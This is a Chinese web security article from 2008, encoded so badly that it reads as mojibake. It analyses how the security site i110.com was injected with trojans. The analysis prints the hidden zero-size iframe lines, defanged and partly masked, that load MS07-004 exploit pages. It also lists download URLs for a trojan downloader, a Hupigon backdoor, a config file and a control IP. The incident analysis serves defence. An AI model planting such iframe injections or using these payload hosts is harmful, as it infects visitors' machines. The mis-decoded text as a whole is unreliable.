ÊÖ»úÕ¾
ÍøÍ¨·ÖÕ¾
µçÐÅÖ÷Õ¾
ÃÜ¡¡Âë:
Óû§Ãû£º
µ±Ç°Î»Öà : Ö÷Ò³>·þÎñÆ÷¼¼Êõ>°²È«·À»¤>Áбí

¶«·½ÎÀÊ¿±»¹ÒÂí °²È«ÍøÕ¾°²È«Ë­À´±£Ö¤

À´Ô´£º»¥ÁªÍø ×÷Õߣºwest263.com ʱ¼ä£º2008-02-23
Î÷²¿ÊýÂë-È«¹úÐéÄâÖ÷»ú10Ç¿£¡40ÓàÏîÐéÄâÖ÷»ú¹ÜÀí¹¦ÄÜ,È«¹úÁìÏÈ!Ë«Ïß¶àÏßÐéÄâÖ÷»úÄϱ±·ÃÎʳ©Í¨ÎÞ×è!Ãâ·ÑÔùËÍÆóÒµÓʾÖ,.CNÓòÃû,×ÔÖú½¨Õ¾480ÔªÆð,Ãâ·ÑÊÔÓÃ7Ìì,ÂúÒâÔÙ¸¶¿î! P4Ö÷»ú×âÓÃ799Ôª/ÔÂ.Ô¸¶Ãâѹ½ð!

¡¾Ô­´´°æÈ¨¶À¼ÒËùÓУ¬ÈçÓû×ªÔØ£¬Çë×¢Ã÷³ö´¦¡°ÈüµÏÍø¡±ºÍÎÄÕÂ×÷Õß¡°Tľ¡±£¡Î¥Õߣ¬ÈüµÏÍø½«±£Áô×·¾¿Æä·¨ÂÉÔðÈεÄȨÀû£¡¡¿

¡¾±àÕß°´£ºÎª°²È«Æð¼û£¬ÎÄÖС°http¡±¾ù±»Ì滻Ϊ¡°hxxp¡±£¬¡°<>¡±¾ù±»Ì滻Ϊ¡°[]¡±£¬ÌØ´Ë˵Ã÷¡£¡¿

ǰÁ½ÌìÓÐÍøÓÑ·´Ó³¹úÄÚÖªÃûµÄ°²È«ÍøÕ¾¶«·½ÎÀÊ¿Ôٴα»¹ÒÔØÄ¾Âí£¬ÕâÒѾ­ÊǶ«·½ÎÀÊ¿µÚ¶þ´Î±©Â¶³ö´æÔÚ°²È«Òþ»¼¡£

»Ø¹Ë

ÔÚ´Ë֮ǰ¾ÍÔø·¢Éú¹ýÒ»´Î¶«·½ÎÀÊ¿ÍøÕ¾Ê×Ò³£¨hxxp://www.i110.com£©´æÔÚ¶ñÒâ´úÂëÒýÓõÄʼþ£¬Èç¹ûÓû§Ã»Óа²×°¹ý΢ÈíµÄMS07-004²¹¶¡³ÌÐò£¬²¢ÇÒʹÓÃIEä¯ÀÀÆ÷·ÃÎÊÉÏÊöÒ³ÃæµÄ»°£¬¾Í»á¸ÐȾľÂí²¡¶¾¡£

¼¼Êõ·ÖÎö£º

1. ¶«·½ÎÀÊ¿ÍøÕ¾Ê×Ò³´úÂëÖУ¬°üº¬ÁËÒ»´¦¶Ô¶ñÒâÍøÒ³µÄÒýÓÃÓï¾ä£º

[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

Èçͼ1£º

ͼ1

2.Õâ¸ö±»ÒýÓõĶñÒâÍøÒ³Öаüº¬ÁËÀûÓÃMS07-004©¶´µÄ´úÂ룬ʹµÃϵͳÄܹ»×Ô¶¯ÏÂÔØhxxp://***.ch/xia.exe£¨Trojan-Downloader.Win32.agent.ddz£©µ½±¾µØ£¬²¢ÔËÐС£

3.xia.exeÊǸöľÂíÏÂÔØÆ÷£¬¸ÃľÂí¸´ÖÆ×ÔÉíµ½%system32%Ŀ¼Ï£¬ÃüÃûΪwdfmg1r32.exe£¬ÔËÐкóÏÂÔØ»Ò¸ë×Ó²¡¶¾hxxp://***.li/2.exe£¨Backdoor.Win32.Hupigon.cpb£©¡£

4.2.exeÊǻҸë×Ó²¡¶¾×îбäÖÖ£¬²ÉÓÃRootKit¼¼Êõ±àд£¬Òþ²Ø½ø³Ì¡£Ëü¸´ÖÆ×ÔÉíµ½%system32%Ŀ¼Ï£¬ÃüÃûΪsystem32.exe£¬¸Ã²¡¶¾ÔËÐкó»áÊÍ·ÅÎļþµ½ %WinDir%\svchost.exe£¬Îļþ´óСΪ381440×Ö½Ú£¬²¢´´½¨ÏÂÃæ·þÎñ£º

·þÎñÃû£ºNet work nois

·þÎñÃèÊö£ºNet work nois

·þÎñ³ÌÐò£ºC:\WINNT\svchost.exe

ÁíÍ⻹»áÏÂÔØhxxp://lxn2wyf8899.3322.org/ip.txtµ½±¾µØÏµÍ³ÁÙʱĿ¼Ï¡£ip.txt°üº¬µÄÄÚÈÝΪ£º

hxxp://221.215.170.192:5600/wwwroot/£¨¸ÃIP¶ÔÓ¦µØÖ·Îª£ºÉ½¶«Ê¡ÇൺÊÐ(Àî

²×Çø)ÍøÍ¨ADSL£©

Ⱦ¶¾µçÄÔ½«±»ºÚ¿ÍÔ¶³ÌÍêÈ«¿ØÖÆ£¬ÕâЩ²Ù×÷¿ÉÄÜÊÇÈÎÒâÎļþ²Ù×÷¡¢×¢²á±í²Ù×÷¡¢¼üÅ̼Ǽ¡¢ÏÂÔØÖ´ÐÐÔ¶³Ì³ÌÐò¡¢ÈÎÒâÍøÂç²Ù×÷ÉõÖÁÔ¶³Ì¿ª»úÉãÏñÍ·¼à¿ØµÈ¡£

Ôٴα»¹ÒÂí

¶øÕâÒ»´Î£¬ÔÚ¶«·½ÎÀÊ¿Ö÷Ò³ÉÏ£¬Í¨¹ý²é¿´Ò³ÃæÔ´´úÂ룬¿ÉÒÔ¿´µ½ÍøÒ³Öб»²åÈëÒ»Ìõ¡°[ iframe src=¡±Ö¸Á¸ÃÖ¸ÁÒþ²Ø´ò¿ªÒ»¸öеÄÒ³Ãæ£¬Õâ¸öÒ³ÃæÎ±ÔìÁËä¯ÀÀÆ÷ÎÞ·¨¿ªµÄ´íÎóÍøÒ³£¬²¢ÔÚºǫ́Òþ²Ø´ò¿ªÈý¸öÒ³Ãæ£¬½øÐÐľÂíÏÂÔØ¡£

´ò¿ªµÄÒþ²ØÒ³Ãæ´úÂ룺

[iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0 

height=0 frameborder=0][/iframe]

ÔÚ´ò¿ªµÄαÔì´íÎóÒ³ÃæÖлá´ò¿ªÈý¸öÍøÒ³£º

[iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0" 

height="0" frameborder="0"][/iframe]

[iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"]

[/iframe]

[iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"]

[/iframe]

ÏÂÔØÄ¾Âí£º

hxxp://www.****.cn/33/Reflector/1.exe£¨ÎÞЧ£©

hxxp://www.*****.com/0.exe

ͼ2

ÎÄÕÂÕûÀí£ºÎ÷²¿ÊýÂë--רҵÌṩÓòÃû×¢²á¡¢ÐéÄâÖ÷»ú·þÎñ
http://www.west263.com
ÒÔÉÏÐÅÏ¢ÓëÎÄÕÂÕýÎÄÊDz»¿É·Ö¸îµÄÒ»²¿·Ö,Èç¹ûÄúÒª×ªÔØ±¾ÎÄÕÂ,Çë±£ÁôÒÔÉÏÐÅÏ¢£¬Ð»Ð»!